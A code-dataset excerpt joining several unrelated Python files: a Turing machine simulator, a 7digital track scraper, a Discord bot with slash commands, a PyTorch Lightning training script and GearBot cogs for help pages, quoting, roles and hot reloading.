:param rejecting_states: rejecting states of the turing machine. rejecting_states \subseteq states (list: (string|integer))
        :param transition_functions: maps (state, symbol) pairs to (out_state, out_symbol, movement) triples (dict)
        :param trace_flag: when True, prints a step-by-step trace while the machine runs (boolean)
"""
if not isinstance(states, list):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid states data type",
"expected data type": "list",
"states": states
})
if not all(isinstance(state, STATE_TYPES) for state in states):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid data type for states element",
"expected data type": "string or integer",
"states": states
})
self._states = states
if not isinstance(alphabet, list):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid alphabet data type",
"expected data type": "list",
"alphabet": alphabet
})
if not all(isinstance(symbol, SYMBOL_TYPES) for symbol in alphabet):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid data type for alphabet element",
"expected data type": "string",
"alphabet": alphabet
})
if BLANK not in alphabet:
alphabet.append(BLANK)
self._alphabet = alphabet
if not isinstance(initial_state, STATE_TYPES):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid initial state data type",
"expected data type": "string or integer",
"initial state": initial_state
})
if initial_state not in self._states:
raise Exceptions.TuringMachineStateException({
"message": "invalid initial state",
"valid states": self._states,
"initial state": initial_state
})
self._initial_state = initial_state
if not isinstance(accepting_states, list):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid accepting states data type",
"expected data type": "list",
"accepting states": accepting_states
})
if not all(isinstance(state, STATE_TYPES) for state in accepting_states):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid data type for accepting states element",
"expected data type": "string or integer",
"accepting states": accepting_states
})
if not set(accepting_states).issubset(self._states):
raise Exceptions.TuringMachineStateException({
"message": "accepting states set is not a subset of states",
"valid states": self._states,
"accepting states": accepting_states
})
self._accepting_states = accepting_states
if not isinstance(rejecting_states, list):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid rejecting states data type",
"expected data type": "list",
"rejecting states": rejecting_states
})
if not all(isinstance(state, STATE_TYPES) for state in rejecting_states):
raise Exceptions.TuringMachineDataTypeException({
"message": "invalid data type for rejecting states element",
"expected data type": "string or integer",
"rejecting states": rejecting_states
})
if not set(rejecting_states).issubset(self._states):
raise Exceptions.TuringMachineStateException({
"message": "rejecting states set is not a subset of states",
"valid states": self._states,
"rejecting states": rejecting_states
})
self._rejecting_states = rejecting_states
self._transition_functions = TransitionFunctions(transition_functions)
self._trace_flag = trace_flag
def _trace(self, current_state, tape, head_location):
"""
Displays tracing for the turing machine. Outputs the current state, the contents of the tape and the visual
position of the read/write head along the tape.
:param current_state: the current state of the turing machine (integer|string)
:param tape: infinite tape for the turing machine (Tape)
:param head_location: read/write head location pointer (integer)
:return: (None)
"""
print("\nCurrent state: {0}".format(current_state))
print("Tape:")
print(tape)
print(" " * head_location + "^")
def _accepted(self, current_state):
"""
Returns whether the :param current_state is a member of the accepting states set
:param current_state: (integer|string)
:return: (boolean)
"""
return current_state in self._accepting_states
def _rejected(self, current_state):
"""
Returns whether the :param current_state is a member of the rejecting states set
:param current_state: (integer|string)
:return: (boolean)
"""
return current_state in self._rejecting_states
def _run(self, tape):
"""
Run method for turing machine.
Executes transition functions based on :param tape
:param tape: initial tape string(string)
:return: (State)
"""
tape = Tape(tape)
current_state = self._initial_state
head_location = 0
while True:
if self._trace_flag:
self._trace(current_state, tape, head_location)
if self._accepted(current_state):
return State.ACCEPTED
if self._rejected(current_state):
return State.REJECTED
symbol = tape[head_location]
out_state, out_symbol, movement = self._transition_functions[(
current_state, symbol
)]
if out_state not in self._states:
raise Exceptions.TuringMachineStateException({
"message": "invalid output state",
"valid states": self._states,
"output state": out_state
})
if out_symbol not in self._alphabet:
raise Exceptions.TuringMachineSymbolException({
"message": "output symbol not in alphabet",
"alphabet": self._alphabet,
"output symbol": out_symbol
})
if not isinstance(movement, MOVEMENT_TYPES):
raise Exceptions.TuringMachineMovementException({
"message": "invalid read/write head movement",
"movement": movement
})
tape[head_location] = out_symbol
current_state = out_state
head_location += movement
def execute(self, tape):
"""
Executes the turing machine using the contents of :param tape and displays the reason why the turing machine
halts, if it halts
:param tape: initial tape contents (string)
:return: (None)
"""
accepted = self.accepts(tape)
print("\nTuring Machine: Halted")
print("Reason for halting: moved into {0} state".format(
"accepting" if accepted else "rejecting"
))
def accepts(self, tape):
"""
        Returns whether turing machine moves into an accepting state
:param tape: initial tape string (string)
:return: (boolean)
"""
return self._run(tape) == State.ACCEPTED
def rejects(self, tape):
"""
Returns whether turing machine moves into a rejecting state
:param tape: initial tape string (string)
:return: (boolean)
"""
return self._run(tape) == State.REJECTED
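# Minimal usage sketch (assumes head movements are the integers +1/-1 and that the
# Tape class yields BLANK beyond the written input): a machine that accepts inputs
# consisting only of "1" symbols.
#   machine = TuringMachine(
#       states=["scan", "accept", "reject"],
#       alphabet=["1"],
#       initial_state="scan",
#       accepting_states=["accept"],
#       rejecting_states=["reject"],
#       transition_functions={
#           ("scan", "1"): ("scan", "1", 1),
#           ("scan", BLANK): ("accept", BLANK, 1)
#       }
#   )
#   machine.execute("111")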
``` |
{
"source": "johnyoonh/twitchExt",
"score": 3
} |
#### File: twitchExt/services/query.py
```python
import requests
import xml.etree.ElementTree as ET
from Song import Song
import csv
import sqlite3
def getArtists():
with open('Artists.csv', 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='|')
for i in range(1237):
next(reader)
for row in reader:
x = row[1]
try:
int(x)
get(x)
except ValueError:
get(row[2])
def get(artistId):
conn = sqlite3.connect('song.db')
c = conn.cursor()
nonce = True
page = 1
pops = []
totalpop = 0
while nonce:
url = 'http://api.7digital.com/1.2/artist/toptracks?shopId=2020&oauth_consumer_key=7d4vr6cgb392&artistId=' + str(artistId) + '&usageTypes=adsupportedstreaming&pagesize=50&page=' + str(page)
r = requests.get(url)
tree = ET.fromstring(r.text)
for child in tree:
children = child.findall('track')
if len(children) < 50:
nonce = False
for x in children:
data = [artistId, x.attrib['id'], x.find('title').text, x.find('duration').text, x.find('explicitContent').text, x.find('popularity').text]
print(data)
c.execute("insert into songs(artistid, id, title, duration, explicitContent, popularity) values (?, ?, ?, ?, ?, ?)", (data[0],data[1],data[2],data[3],data[4], data[5]))
page += 1
conn.commit()
def normalize(val):
conn = sqlite3.connect('song.db')
c = conn.cursor()
c.execute("update songs set normalizedPopularity = (?)")
def createSongDb():
conn = sqlite3.connect('song.db')
c = conn.cursor()
c.execute("create table songs(artistid, id, title, duration, explicitContent, popularity);")
# createSongDb()
getArtists()
``` |
{
"source": "Johnypier/First_Bot",
"score": 3
} |
#### File: Johnypier/First_Bot/judicator.py
```python
import discord
import secrets
import random
import platform
import constants
import utilities
import datetime
from types import SimpleNamespace
from discord.ext import commands
from discord.commands import Option
bot = commands.Bot(
intents=discord.Intents.all(),
status=discord.Status.streaming,
activity=constants.ACTIVITIES['STREAM']
)
bot.colors = constants.BOT_COLORS
bot.color_list = SimpleNamespace(**bot.colors)
@bot.event
async def on_ready():
channel = await bot.fetch_channel(936376047417569280)
await channel.purge(limit=1)
await channel.send("Will you share your knowledge with others and help all members of this server?", view=utilities.RoleView())
print(
f"-----\nLogged in as: {bot.user.name} : {bot.user.id}\n-----\nMy current activity:{bot.activity}\n-----")
@bot.event
async def on_message(message: discord.Message):
"""
Checks for users messages.
"""
    if message.author == bot.user or message.author.bot:
return
# Change to true if you want to enable censorship
if constants.CENSORHIP_STATUS:
channel = message.channel
censored_message = utilities.censor_message(message.content)
if message.content != censored_message:
await message.delete()
await channel.send(message.author.mention + f" Censored: {censored_message} ")
@bot.slash_command(description="Ping-Pong game.", guild_ids=[int(secrets.GUILD_ID)])
async def ping(ctx: discord.ApplicationContext):
await ctx.respond(f"Pong! {random.randrange(0, 1000)} ms")
@bot.slash_command(description="Greets the user.", guild_ids=[int(secrets.GUILD_ID)])
async def hello(ctx: discord.ApplicationContext):
"""
A simple command which says hi to the author.
"""
await ctx.respond(f"Hi {ctx.author.mention}!")
@bot.slash_command(description="Deletes specified amount of messages from channel.", guild_ids=[int(secrets.GUILD_ID)])
@commands.is_owner()
async def clear(
ctx: discord.ApplicationContext,
limit: Option(int, "Enter number of messages")
):
"""
Deletes number of messages specified by owner
"""
await ctx.channel.purge(limit=limit)
await ctx.respond("Channel cleared!")
@clear.error
async def clear_error(ctx: discord.ApplicationContext, error):
"""
Error handler for cleaning function
"""
if isinstance(error, commands.CheckFailure):
await ctx.respond("Hey! You lack permission to use this command as you do not own the bot.")
else:
raise error
@bot.slash_command(description="Turns off the bot.", guild_ids=[int(secrets.GUILD_ID)])
@commands.is_owner()
async def logout(ctx: discord.ApplicationContext):
"""
If the user running the command owns the bot then this will disconnect the bot from discord.
"""
await ctx.respond(f"Hey {ctx.author.mention}, I am now logging out :wave:")
await bot.close()
@logout.error
async def logout_error(ctx: discord.ApplicationContext, error):
"""
Whenever the logout command has an error this will be tripped.
"""
if isinstance(error, commands.CheckFailure):
await ctx.respond("Hey! You lack permission to use this command as you do not own the bot.")
else:
raise error
@bot.slash_command(description="Shows bot information.", guild_ids=[int(secrets.GUILD_ID)])
async def stats(ctx: discord.ApplicationContext):
"""
    A useful command that displays bot statistics.
"""
embed = discord.Embed(title=f'{bot.user.name} Stats', description='\uFEFF',
colour=ctx.author.colour, timestamp=datetime.datetime.utcnow())
embed.add_field(name="Bot version:", value="2.0")
embed.add_field(name='Python Version:', value=platform.python_version())
embed.add_field(name='Discord.Py Version', value=discord.__version__)
embed.add_field(name='Total Guilds:', value=str(len(bot.guilds)))
embed.add_field(name='Total Users:', value=str(
len(set(bot.get_all_members()))))
embed.add_field(name='Bot owner:', value="<@503505263119040522>")
embed.add_field(name='Bot Developers:',
value="<@503505263119040522>\n<@453579828281475084>\n<@890664690533957643>")
embed.set_footer(text=f"{bot.user.name}",
icon_url=f"{bot.user.avatar.url}")
await ctx.respond(embed=embed)
@bot.slash_command(description="Sends information to specific channel in beautiful block.", guild_ids=[int(secrets.GUILD_ID)])
async def post(
ctx: discord.ApplicationContext,
info: Option(str, "Enter your information"),
channel: Option(discord.TextChannel, "Select a channel"),
topic: Option(str, "Enter your title")
):
temp = channel.name
if temp not in constants.BLOCKED_CHANNELS:
embed = discord.Embed(title=topic, description='\uFEFF',
colour=ctx.author.colour, timestamp=datetime.datetime.utcnow())
embed.add_field(name="Information", value=info)
        if ctx.author.avatar is None:
embed.set_footer(text=f"{ctx.author.name}",
icon_url=f"{bot.user.avatar.url}")
else:
embed.set_footer(text=f"{ctx.author.name}",
icon_url=f"{ctx.author.avatar.url}")
guild = bot.get_guild(int(secrets.GUILD_ID))
for ch in guild.channels:
if ch.name == temp:
await ch.send(embed=embed)
await ctx.respond("Message sent!")
return
await ctx.respond("Channel not found!")
else:
await ctx.respond("You are not able to write messages in " + temp + " channel!")
@bot.slash_command(description="Shows all available channels for post command.", guild_ids=[int(secrets.GUILD_ID)])
async def channels(ctx: discord.ApplicationContext):
guild = bot.get_guild(int(secrets.GUILD_ID))
embed = discord.Embed(title=f'Available Channels:', description='\uFEFF',
colour=ctx.author.colour, timestamp=datetime.datetime.utcnow())
for channel in guild.channels:
if channel.name not in constants.BLOCKED_CHANNELS:
embed.add_field(name=f"{channel.name}:", value=channel.topic)
embed.set_footer(text=f"{ctx.author.name}",
icon_url=f"{ctx.author.avatar.url}")
await ctx.respond(embed=embed)
@bot.slash_command(description="Send files to specific channel.", guild_ids=[int(secrets.GUILD_ID)])
async def attach(
ctx: discord.ApplicationContext,
channel: Option(discord.TextChannel, "Select a channel"),
attachment: discord.Attachment
):
temp = channel.name
if temp not in constants.BLOCKED_CHANNELS:
guild = bot.get_guild(int(secrets.GUILD_ID))
tmp = await attachment.to_file(use_cached=False, spoiler=False)
for ch in guild.channels:
if ch.name == temp:
await ch.send(f"**{tmp.filename}** sent by "+ctx.author.mention)
await ch.send(file=tmp)
await ctx.respond("File sent!")
                return
        await ctx.respond("Channel not found!")
else:
await ctx.respond("You are not able to write messages in " + temp + " channel!")
@bot.slash_command(description="Shows all available commands.", guild_ids=[int(secrets.GUILD_ID)])
async def help(ctx: discord.ApplicationContext):
embed = discord.Embed(title=f'Available Commands:', description='\uFEFF',
colour=ctx.author.colour, timestamp=datetime.datetime.utcnow())
# For some reason help command is repeated twice in the list.
skip = 0
for command in bot.application_commands:
if command.description != "Shows all available commands.":
embed.add_field(name=f"{command}:", value=command.description)
else:
if skip == 1:
embed.add_field(name=f"{command}:", value=command.description)
skip += 1
embed.set_footer(text=f"{ctx.author.name}",
icon_url=f"{ctx.author.avatar.url}")
await ctx.respond(embed=embed)
bot.run(secrets.OPEN_SOURCE_TOKEN)
``` |
{
"source": "JohnySilva/mlhep-2021-comp2-code",
"score": 2
} |
#### File: JohnySilva/mlhep-2021-comp2-code/train.py
```python
import configparser
import pathlib as path
import torch
import numpy as np
import pytorch_lightning as pl
from pytorch_lightning import seed_everything
from idao.data_module import IDAODataModule
from idao.model import SimpleConv, Print
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from pytorch_lightning.callbacks import ModelCheckpoint
#device="cuda:2"
#%%
def trainer(mode: ["classification", "regression"], cfg, dataset_dm, filename):
model = SimpleConv(mode=mode)#.to(device)
if mode == "classification":
epochs = cfg["TRAINING"]["ClassificationEpochs"]
else:
epochs = cfg["TRAINING"]["RegressionEpochs"]
checkpoint_callback = ModelCheckpoint(
monitor='val_loss',
dirpath='checkpoint_model/',
filename=filename,
save_top_k=3,
mode='min',
)
trainer = pl.Trainer(
gpus=int(cfg["TRAINING"]["NumGPUs"]),
max_epochs=int(epochs),
progress_bar_refresh_rate=20,
weights_save_path=path.Path(cfg["TRAINING"]["ModelParamsSavePath"]).joinpath(
mode
),
default_root_dir=path.Path(cfg["TRAINING"]["ModelParamsSavePath"]),
callbacks=[EarlyStopping(monitor="val_loss"), checkpoint_callback]
)
    # Train the model ⚡
trainer.fit(model, dataset_dm)
#%%
def main():
seed_everything(666)
config = configparser.ConfigParser()
config.read("./config.ini")
PATH = path.Path(config["DATA"]["DatasetPath"])
dataset_dm = IDAODataModule(
data_dir=PATH, batch_size=int(config["TRAINING"]["BatchSize"]), cfg=config
)
dataset_dm.prepare_data()
dataset_dm.setup()
filename='best_model_53/best_model-{epoch:02d}-{val_loss:.2f}'
#for mode in ["classification", "regression"]:
mode = "regression"
print(f"Training for {mode}")
trainer(mode, cfg=config, dataset_dm=dataset_dm, filename=filename)
if __name__ == "__main__":
main()
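# Illustrative sketch (not from the original repo): the sections and keys that this
# script reads from config.ini, based solely on the lookups above. Concrete values
# are placeholders.
#
# [DATA]
# DatasetPath = ./data
#
# [TRAINING]
# BatchSize = 64
# NumGPUs = 1
# ClassificationEpochs = 10
# RegressionEpochs = 10
# ModelParamsSavePath = ./weights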
#%%
``` |
{
"source": "JohnyTheCarrot/GearBot",
"score": 3
} |
#### File: GearBot/Cogs/AntiRaid.py
```python
import discord
from discord.ext import commands
class AntiRaid:
def __init__(self, bot):
self.bot: commands.Bot = bot
async def sound_the_alarm(self, guild):
print("alarm triggered!")
pass
async def on_member_join(self, member: discord.Member):
# someone joined, track in redis, query
pass
def setup(bot):
bot.add_cog(AntiRaid(bot))
```
#### File: GearBot/Cogs/Basic.py
```python
import asyncio
import random
import time
from datetime import datetime
import discord
from discord.ext import commands
from discord.ext.commands import clean_content, BadArgument
from Util import Configuration, Pages, HelpGenerator, Permissioncheckers, Emoji, Translator, Utils, GearbotLogging
from Util.Converters import Message
from Util.JumboGenerator import JumboGenerator
from database.DatabaseConnector import LoggedAttachment
class Basic:
permissions = {
"min": 0,
"max": 6,
"required": 0,
"commands": {
}
}
def __init__(self, bot):
self.bot: commands.Bot = bot
Pages.register("help", self.init_help, self.update_help)
Pages.register("role", self.init_role, self.update_role)
self.running = True
self.bot.loop.create_task(self.taco_eater())
def __unload(self):
# cleanup
Pages.unregister("help")
Pages.unregister("role")
self.running = False
async def __local_check(self, ctx):
return Permissioncheckers.check_permission(ctx)
@commands.command()
async def about(self, ctx):
"""about_help"""
uptime = datetime.utcnow() - self.bot.start_time
hours, remainder = divmod(int(uptime.total_seconds()), 3600)
days, hours = divmod(hours, 24)
minutes, seconds = divmod(remainder, 60)
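        # Worked example of the arithmetic above (illustrative): an uptime of 93784 s gives
        # divmod(93784, 3600) = (26, 184); divmod(26, 24) = (1, 2); divmod(184, 60) = (3, 4),
        # i.e. 1 day, 2 hours, 3 minutes and 4 seconds.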
tacos = "{:,}".format(round(self.bot.eaten))
user_messages = "{:,}".format(self.bot.user_messages)
bot_messages = "{:,}".format(self.bot.bot_messages)
self_messages = "{:,}".format(self.bot.self_messages)
total = "{:,}".format(sum(len(guild.members) for guild in self.bot.guilds))
unique = "{:,}".format(len(self.bot.users))
embed = discord.Embed(colour=discord.Colour(0x00cea2),
timestamp=datetime.utcfromtimestamp(time.time()),
description=f"{Emoji.get_chat_emoji('DIAMOND')} Gears have been spinning for {days} {'day' if days is 1 else 'days'}, {hours} {'hour' if hours is 1 else 'hours'}, {minutes} {'minute' if minutes is 1 else 'minutes'} and {seconds} {'second' if seconds is 1 else 'seconds'}\n"
f"{Emoji.get_chat_emoji('GOLD')} I received {user_messages} user messages, {bot_messages} bot messages ({self_messages} were mine)\n"
f"{Emoji.get_chat_emoji('IRON')} Number of times people grinded my gears: {self.bot.errors}\n"
f"{Emoji.get_chat_emoji('STONE')} {self.bot.commandCount} commands have been executed, as well as {self.bot.custom_command_count} custom commands\n"
f"{Emoji.get_chat_emoji('WOOD')} Working in {len(self.bot.guilds)} guilds\n"
f"{Emoji.get_chat_emoji('INNOCENT')} With a total of {total} users ({unique} unique)\n"
f":taco: Together they could have eaten {tacos} tacos in this time\n"
f"{Emoji.get_chat_emoji('TODO')} Add more stats")
embed.add_field(name=f"Support server", value="[Click here](https://discord.gg/vddW3D9)")
embed.add_field(name=f"Website", value="[Click here](https://gearbot.aenterprise.info)")
embed.add_field(name=f"Github", value="[Click here](https://github.com/AEnterprise/GearBot)")
embed.set_footer(text=self.bot.user.name, icon_url=self.bot.user.avatar_url)
await ctx.send(embed=embed)
@commands.command(hidden=True)
async def ping(self, ctx: commands.Context):
"""ping_help"""
if await self.bot.is_owner(ctx.author):
t1 = time.perf_counter()
await ctx.trigger_typing()
t2 = time.perf_counter()
await ctx.send(
f":hourglass: REST API ping is {round((t2 - t1) * 1000)}ms | Websocket ping is {round(self.bot.latency*1000, 2)}ms :hourglass:")
else:
await ctx.send(":ping_pong:")
@commands.command()
@commands.bot_has_permissions(embed_links=True)
async def quote(self, ctx: commands.Context, *, message:Message):
"""quote_help"""
await ctx.trigger_typing()
member = message.guild.get_member(ctx.author.id)
if member is None:
await GearbotLogging.send_to(ctx, 'NO', 'quote_not_visible_to_user')
else:
permissions = message.channel.permissions_for(member)
            # the original checked read_message_history twice; the first check was presumably meant to be read_messages
            if permissions.read_messages and permissions.read_message_history:
if message.channel.is_nsfw() and not ctx.channel.is_nsfw():
await GearbotLogging.send_to(ctx, 'NO', 'quote_nsfw_refused')
else:
attachment = None
attachments = LoggedAttachment.select().where(LoggedAttachment.messageid == message.id)
if len(attachments) == 1:
attachment = attachments[0]
embed = discord.Embed(colour=discord.Color(0xd5fff),
timestamp=message.created_at)
if message.content is None or message.content == "":
if attachment is not None:
if attachment.isImage:
embed.set_image(url=attachment.url)
else:
embed.add_field(name=Translator.translate("attachment_link", ctx),
value=attachment.url)
else:
description = message.content
embed = discord.Embed(colour=discord.Color(0xd5fff), description=description,
timestamp=message.created_at)
                        embed.add_field(name="\u200b",
value=f"[Jump to message]({message.jump_url})")
if attachment is not None:
if attachment.isImage:
embed.set_image(url=attachment.url)
else:
embed.add_field(name=Translator.translate("attachment_link", ctx),
value=attachment.url)
user = message.author
embed.set_author(name=user.name, icon_url=user.avatar_url)
embed.set_footer(
text=Translator.translate("quote_footer", ctx,
channel=message.channel.name,
user=Utils.clean_user(ctx.author), message_id=message.id))
await ctx.send(embed=embed)
if ctx.channel.permissions_for(ctx.me).manage_messages:
await ctx.message.delete()
else:
await GearbotLogging.send_to(ctx, 'NO', 'quote_not_visible_to_user')
@commands.command()
async def coinflip(self, ctx, *, thing: str = ""):
"""coinflip_help"""
if thing == "":
thing = Translator.translate("coinflip_default", ctx)
else:
thing = await Utils.clean(thing, ctx.guild)
outcome = random.randint(1, 2)
if outcome == 1 or ("mute" in thing and "vos" in thing):
await ctx.send(Translator.translate("coinflip_yes", ctx, thing=thing))
else:
await ctx.send(Translator.translate("coinflip_no", ctx, thing=thing))
async def init_role(self, ctx):
pages = self.gen_role_pages(ctx.guild)
page = pages[0]
emoji = []
for i in range(10 if len(pages) > 1 else round(len(page.splitlines()) / 2)):
emoji.append(Emoji.get_emoji(str(i + 1)))
embed = discord.Embed(
title=Translator.translate("assignable_roles", ctx, server_name=ctx.guild.name, page_num=1,
page_count=len(pages)), colour=discord.Colour(0xbffdd), description=page)
return None, embed, len(pages) > 1, emoji
async def update_role(self, ctx, message, page_num, action, data):
pages = self.gen_role_pages(message.guild)
page, page_num = Pages.basic_pages(pages, page_num, action)
embed = discord.Embed(
title=Translator.translate("assignable_roles", ctx, server_name=message.channel.guild.name, page_num=page_num + 1,
page_count=len(pages)), color=0x54d5ff, description=page)
return None, embed, page_num
def gen_role_pages(self, guild: discord.Guild):
roles = Configuration.get_var(guild.id, "SELF_ROLES")
current_roles = ""
count = 1
for role in roles:
current_roles += f"{count}) <@&{role}>\n\n"
count += 1
if count > 10:
count = 1
return Pages.paginate(current_roles, max_lines=20)
@commands.command()
@commands.bot_has_permissions(embed_links=True)
@commands.guild_only()
async def role(self, ctx: commands.Context, *, role: str = None):
"""role_help"""
if role is None:
await Pages.create_new("role", ctx)
else:
try:
role = await commands.RoleConverter().convert(ctx, role)
except BadArgument as ex:
await ctx.send(Translator.translate("role_not_found", ctx))
else:
roles = Configuration.get_var(ctx.guild.id, "SELF_ROLES")
if role.id in roles:
try:
if role in ctx.author.roles:
await ctx.author.remove_roles(role)
await ctx.send(Translator.translate("role_left", ctx, role_name=role.name))
else:
await ctx.author.add_roles(role)
await ctx.send(Translator.translate("role_joined", ctx, role_name=role.name))
except discord.Forbidden:
await ctx.send(
f"{Emoji.get_chat_emoji('NO')} {Translator.translate('mute_role_to_high', ctx, role=role.name)}")
else:
await ctx.send(Translator.translate("role_not_allowed", ctx))
# @commands.command()
# async def test(self, ctx):
# async def send(message):
# await ctx.send(message)
# await Confirmation.confirm(ctx, "You sure?", on_yes=lambda : send("Doing the thing!"), on_no=lambda: send("Not doing the thing!"))
@commands.command()
async def help(self, ctx, *, query: str = None):
"""help_help"""
await Pages.create_new("help", ctx, query=query)
async def init_help(self, ctx, query):
pages = await self.get_help_pages(ctx, query)
if pages is None:
query_clean = await clean_content().convert(ctx, query)
return await clean_content().convert(ctx, Translator.translate(
"help_not_found" if len(query) < 1500 else "help_no_wall_allowed", ctx,
query=query_clean)), None, False, []
return f"**{Translator.translate('help_title', ctx, page_num=1, pages=len(pages))}**```diff\n{pages[0]}```", None, len(
pages) > 1, []
async def update_help(self, ctx, message, page_num, action, data):
pages = await self.get_help_pages(ctx, data["query"])
page, page_num = Pages.basic_pages(pages, page_num, action)
return f"**{Translator.translate('help_title', ctx, page_num=page_num + 1, pages=len(pages))}**```diff\n{page}```", None, page_num
async def get_help_pages(self, ctx, query):
if query is None:
return await HelpGenerator.command_list(self.bot, ctx)
else:
if query in self.bot.cogs:
return await HelpGenerator.gen_cog_help(self.bot, ctx, query)
else:
target = self.bot
layers = query.split(" ")
while len(layers) > 0:
layer = layers.pop(0)
if hasattr(target, "all_commands") and layer in target.all_commands.keys():
target = target.all_commands[layer]
else:
target = None
break
if target is not None and target is not self.bot.all_commands:
return await HelpGenerator.gen_command_help(self.bot, ctx, target)
return None
@commands.command()
@commands.bot_has_permissions(attach_files=True)
async def jumbo(self, ctx, *, emojis: str):
"""Jumbo emoji"""
await JumboGenerator(ctx, emojis).generate()
async def on_guild_role_delete(self, role: discord.Role):
roles = Configuration.get_var(role.guild.id, "SELF_ROLES")
if role.id in roles:
roles.remove(role.id)
Configuration.save(role.guild.id)
async def taco_eater(self):
"""A person can eat a taco every 5 mins, we run every 5s"""
GearbotLogging.info("Time to start munching on some ๐ฎ")
while self.running:
self.bot.eaten += len(self.bot.users) / 60
await asyncio.sleep(5)
GearbotLogging.info("Cog terminated, guess no more ๐ฎ for people")
async def on_raw_reaction_add(self, payload: discord.RawReactionActionEvent):
guild = self.bot.get_guild(payload.guild_id)
if guild is None:
return
if guild.me.id == payload.user_id:
return
try:
message = await self.bot.get_channel(payload.channel_id).get_message(payload.message_id)
except discord.NotFound:
pass
else:
if str(payload.message_id) in Pages.known_messages:
info = Pages.known_messages[str(payload.message_id)]
if info["type"] == "role":
for i in range(10):
e = Emoji.get_emoji(str(i + 1))
if payload.emoji.name == e:
roles = Configuration.get_var(guild.id, "SELF_ROLES")
channel = self.bot.get_channel(payload.channel_id)
number = info['page'] * 10 + i
if number >= len(roles):
await GearbotLogging.send_to(channel, "NO", "role_not_on_page", requested=number+1, max=len(roles) % 10, delete_after=10)
return
role = guild.get_role(roles[number])
if role is None:
return
member = guild.get_member(payload.user_id)
try:
if role in member.roles:
await member.remove_roles(role)
added = False
else:
await member.add_roles(role)
added = True
except discord.Forbidden:
emessage = f"{Emoji.get_chat_emoji('NO')} {Translator.translate('mute_role_to_high', payload.guild_id, role=role.name)}"
try:
await channel.send(emessage)
except discord.Forbidden:
try:
                                        await member.send(emessage)
except discord.Forbidden:
pass
else:
try:
action_type = 'role_joined' if added else 'role_left'
await channel.send(f"{member.mention} {Translator.translate(action_type, payload.guild_id, role_name=role.name)}", delete_after=10)
except discord.Forbidden:
pass
if channel.permissions_for(guild.me).manage_messages:
await message.remove_reaction(e, member)
break
def setup(bot):
bot.add_cog(Basic(bot))
```
#### File: GearBot/Cogs/Reload.py
```python
import asyncio
import importlib
import os
from discord.ext import commands
import Util
from Util import GearbotLogging, Emoji, Translator, DocUtils, Utils
class Reload:
def __init__(self, bot):
self.bot:commands.Bot = bot
async def __local_check(self, ctx):
return await ctx.bot.is_owner(ctx.author)
@commands.command(hidden=True)
async def reload(self, ctx, *, cog: str):
cogs = []
for c in ctx.bot.cogs:
cogs.append(c.replace('Cog', ''))
if cog in cogs:
self.bot.unload_extension(f"Cogs.{cog}")
self.bot.load_extension(f"Cogs.{cog}")
await ctx.send(f'**{cog}** has been reloaded.')
await GearbotLogging.bot_log(f'**{cog}** has been reloaded by {ctx.author.name}.', log=True)
else:
await ctx.send(f"{Emoji.get_chat_emoji('NO')} I can't find that cog.")
@commands.command(hidden=True)
async def load(self, ctx, cog: str):
if os.path.isfile(f"Cogs/{cog}.py") or os.path.isfile(f"GearBot/Cogs/{cog}.py"):
self.bot.load_extension(f"Cogs.{cog}")
await ctx.send(f"**{cog}** has been loaded!")
await GearbotLogging.bot_log(f"**{cog}** has been loaded by {ctx.author.name}.")
GearbotLogging.info(f"{cog} has been loaded")
else:
await ctx.send(f"{Emoji.get_chat_emoji('NO')} I can't find that cog.")
@commands.command(hidden=True)
async def unload(self, ctx, cog: str):
if cog in ctx.bot.cogs:
self.bot.unload_extension(f"Cogs.{cog}")
await ctx.send(f'**{cog}** has been unloaded.')
await GearbotLogging.bot_log(f'**{cog}** has been unloaded by {ctx.author.name}')
GearbotLogging.info(f"{cog} has been unloaded")
else:
await ctx.send(f"{Emoji.get_chat_emoji('NO')} I can't find that cog.")
@commands.command(hidden=True)
async def hotreload(self, ctx:commands.Context):
self.bot.hot_reloading = True
GearbotLogging.SHOULD_TERMINATE = True
message = await GearbotLogging.bot_log(f"{Emoji.get_chat_emoji('REFRESH')} Hot reload in progress...")
ctx_message = await ctx.send(f"{Emoji.get_chat_emoji('REFRESH')} Hot reload in progress...")
GearbotLogging.info("Initiating hot reload")
await asyncio.sleep(2)
utils = importlib.reload(Util)
await utils.reload(self.bot)
GearbotLogging.info("Reloading all cogs...")
temp = []
for cog in ctx.bot.cogs:
temp.append(cog)
for cog in temp:
self.bot.unload_extension(f"Cogs.{cog}")
GearbotLogging.info(f'{cog} has been unloaded.')
self.bot.load_extension(f"Cogs.{cog}")
GearbotLogging.info(f'{cog} has been loaded.')
GearbotLogging.info("Hot reload complete.")
m = f"{Emoji.get_chat_emoji('YES')} Hot reload complete"
await message.edit(content=m)
await ctx_message.edit(content=m)
await Translator.upload()
await DocUtils.update_docs(ctx.bot)
self.bot.hot_reloading = False
@commands.command()
async def pull(self, ctx):
"""Pulls from github so an upgrade can be performed without full restart"""
async with ctx.typing():
code, out, error = await Utils.execute(["git pull origin master"])
            if code == 0:
await ctx.send(f"{Emoji.get_chat_emoji('YES')} Pull completed with exit code {code}```yaml\n{out.decode('utf-8')}```")
else:
await ctx.send(
f"{Emoji.get_chat_emoji('NO')} Pull completed with exit code {code}```yaml\n{out.decode('utf-8')}\n{error.decode('utf-8')}```")
def setup(bot):
bot.add_cog(Reload(bot))
```
#### File: GearBot/Util/Pages.py
```python
import discord
from Util import Utils, Emoji, Translator
page_handlers = dict()
known_messages = dict()
def on_ready(bot):
load_from_disc()
def register(type, init, update, sender_only=False):
page_handlers[type] = {
"init": init,
"update": update,
"sender_only": sender_only
}
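# Handler contract inferred from create_new() and update() below (descriptive note only):
#   init(ctx, **kwargs) -> (text, embed, has_pages, emoji)
#   update(ctx, message, page_num, action, data) -> (text, embed, page_num)
# where data is the dict stored in known_messages and action is a paging action
# such as "PREV"/"NEXT" (see basic_pages).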
def unregister(type_handler):
if type_handler in page_handlers.keys():
del page_handlers[type_handler]
async def create_new(type, ctx, **kwargs):
text, embed, has_pages, emoji = await page_handlers[type]["init"](ctx, **kwargs)
message: discord.Message = await ctx.channel.send(text, embed=embed)
if has_pages or len(emoji) > 0:
data = {
